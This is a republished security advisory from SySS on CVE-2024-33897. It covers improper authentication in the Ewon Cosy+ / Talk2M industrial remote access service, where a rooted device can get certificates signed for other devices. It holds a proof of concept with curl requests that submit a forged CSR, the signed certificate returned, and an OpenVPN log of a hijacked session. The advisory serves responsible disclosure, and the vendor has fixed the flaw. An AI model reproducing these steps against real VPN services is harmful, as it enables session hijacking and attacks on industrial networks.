Security
Headlines
HeadlinesLatestCVEs

Headline

Ewon Cosy+ / Talk2M Remote Access Solution Improper Authentication

During account assignment in the Talk2M platform, a Cosy+ device generates and sends a certificate signing request (CSR) to the back end. This CSR is then signed by the manufacturer and used for OpenVPN authentication by the device afterward. Since the common name (CN) of the certificate is specified by the device and used in order to assign the OpenVPN session to the corresponding Talk2M account, an attacker with root access to a Cosy+ device is able to manipulate the CSR and get correctly signed certificates for foreign devices.

Packet Storm
#vulnerability#web#mac#windows#apache#js#pdf#auth#ssl

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2024-043
Product: Ewon Cosy+ / Talk2M Remote Access Solution
Manufacturer: HMS Industrial Networks AB
Affected Version(s): N.A.
Tested Version(s): N.A.
Vulnerability Type: Improper Authentication (CWE-287)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2024-04-17
Solution Date: 2024-04-18
Public Disclosure: 2024-08-11
CVE Reference: CVE-2024-33897
Author of Advisory: Moritz Abrell, SySS GmbH


Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

Vulnerability Details:

During account assignment in the Talk2M platform, a Cosy+ device
generates and sends a certificate signing request (CSR) to the back end.
This CSR is then signed by the manufacturer and used for OpenVPN
authentication by the device afterward.

Since the common name (CN) of the certificate is specified by the device
and used in order to assign the OpenVPN session to the corresponding
Talk2M account, an attacker with root access to a Cosy+ device is able
to manipulate the CSR and get correctly signed certificates for foreign
devices.

Using these certificates for OpenVPN authentication results in hijacking
the VPN session and allows for further attacks, e.g.:

    • Impacting the accessibility of the original device
    • Attacking the Talk2M-connected user device via the VPN connection
    • Eavesdropping and manipulating the network communication of connected
      users

Proof of Concept (PoC):

Note: Since the X.509 client certificate of a Cosy+, which is used for  
       authentication against the Talk2M API, is handled by the hardware  
       security module (HSM), root access to a Cosy+ device is required.

1. Exporting the OpenSSL engine to use the hardware security module:

        $ export OPENSSL_CONF=/etc/ssl/se050_openssl.cnf  
    $ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0

2. Sending a self-created CSR to the Talk2M API:

      $ curl --path-as-is -i -s -k -X $'POST' \  
     -H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \  
     -H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \  
     -H $'Device-State: AccountLinked' -H $'Content-Length: 768' \  
     --data-binary $'{\x0a\x09\"csr\":  
         \x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY  
         xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U  
         EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt  
         zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI  
         1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE  
         GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\  
         nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX  
         aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO  
         4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu  
         6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi  
         PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW  
         vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT  
         E REQUEST-----\\n\"\x0a}' \  
     $'https://eu.device.talk2m.com/certificates/csr' \  
     --cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem

3. Requesting the signed certificate:

          $ curl -i -k -H $'Device-State: AccountLinked' \  
     https://device.talk2m.com/certificates/deviceCertificate  \  
     --cert birth_key_crt.pem --key birth_key_ref.pem

4. Talk2M response:

          HTTP/1.1 200  
     date: Tue, 16 Apr 2024 13:09:57 GMT  
     server: Apache  
     ewon-server-time: 1713272998  
     device-state: VpnProvisioned  
     content-type: application/json  
     transfer-encoding: chunked

          {"certificate":"-----BEGIN CERTIFICATE-----\nMIIDTjCCAjagAwIBA[...]  
     KsxyR8w==\n-----END CERTIFICATE-----"}

5. This signed certificate and the used key can be used for OpenVPN  
    authentication. The CN will be used to assign the session to the  
    corresponding Talk2M account. This also overwrites a potential  
    current VPN session of the original device:

     $ openvpn --config attacker.ovpn  
       Attempting to establish TCP connection with [AF_INET]51.195.79.69:443  
       TCP connection established with [AF_INET]51.195.79.69:443  
       TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443  
       VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa,  
         OU=Talk2M, CN=Talk2M Certification Authority,  
         [email protected]  
       VERIFY KU OK  
       Validating certificate extended key usage  
       ++ Certificate has EKU (str) TLS Web Server Authentication,  
         expects TLS Web Server Authentication  
       VERIFY EKU OK  
       VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles,  
         O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device,  
         [email protected]  
       Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384,  
         peer certificate: 2048 bit RSA, signature: RSA-SHA1  
       [server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443  
       TUN/TAP device tap0 opened  
       net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0  
       TUN/TAP link layer address set to 00:03:27:d8:68:84  
       net_iface_mtu_set: mtu 1500 for tap0  
       net_iface_up: set tap0 up  
       net_addr_v4_add: 10.37.211.214/16 dev tap0  
       Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo'  
       Timers: ping 10, ping-exit 40  
       Initialization Sequence Completed

Solution:

The vulnerability was fixed in the back end by HMS on April 18, 2024.


Disclosure Timeline:

2024-04-09: Potential vulnerability discovered  
2024-04-16: Call with the manufacturer and requested a Talk2M account  
             with an assigned device to verify the potential vulnerability  
2024-04-16: Manufacturer provided a Talk2M account with an assigned device  
2024-04-16: Vulnerability confirmed  
2024-04-16: Short update about the state sent to the manufacturer  
2024-04-16: Security advisory inculding technical details provided to  
             the manufacturer  
2024-04-18: Vulnerability fixed by the manufacturer  
2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer  
2024-07-12: Manufacturer asked for reviewing the blog post draft  
2024-07-12: Confirmed reviewing the blog post is possible and asking for  
             the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post  
2024-07-24: Manufacturer also asked for an appointment to discuss the blog post  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

References:

[1] Ewon Cosy+ product website
https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet
[2] SySS Security Advisory SYSS-2024-043
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
[4] Manufacturer note
https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001–ewon-several-cosy–vulnerabilities.pdf
[5] CVE-2024-33897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897
[6] Blog post
https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/
[7] DEF CON talk
https://defcon.org/html/defcon-32/dc-32-speakers.html#54521


Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:[email protected]  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

Disclaimer:

The information provided in this security advisory is provided “as is”
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.


Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay47wACgkQrgyb+PE0  
i1O5RQ/9HM9YIPRLVqGSRNPYW45F9e1wj9uHTvt78XjRng5lbRPpgWAO1G6UVQvS  
ebugxzjAtGrdMxx8X1NHd9vbshyAHj/q33Y0fkQ5TB2hnSMkn2nbXTEZKIIS6wK0  
XnJhB31iVnkgMeNFQ0SwSutBnnxJ7mvQ6vUBG210DSHjpQtu8rWuCyrf3BcSCJ/I  
nT79b7TJOxOMD1y5VAeVP6Pehh+IlJgvSItXZyOjs4wgt/+z+wVoKnYdqSAHpovI  
/rjVbtp7cvIhQInghnDoRWfXce34bk07geOB4VGg7bhxGCeWbJZq/Dxrag5jJb9l  
0zx2K4M8ZTwFcrtAliFgyzrIgvjfOk9HCZasSMl20znj4+3QaAWpfn2oMmCQCaLg  
6hBqAQ+s66Cv8Br24WKdlnj3nrsn+SAX2TKDxajt+WiDkXKvsLPs8XCmzVN8jViK  
nN/dJ3chba4yhqmpft1wRXG71VvBdbv3pkLp7usKszUrul8M802JzF2aGTUsiKgQ  
QSxpNhSP4aC2jqjt1OpX7W6NKD1nIhg0VrduxlwlAcQ2uffbh8xtak1MgZry0/yP  
6j9a15DOTJshMeud8R3Bkfjms/0Jzm43uyjIeRGNP79UyohsTX4jOJAsUYr0efUZ  
/55N3HiCD94jYoee5E3sF1vWlrhVDzkWJ7Q8u/W4osSIwMNikTc=  
=JS3w  
-----END PGP SIGNATURE-----

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution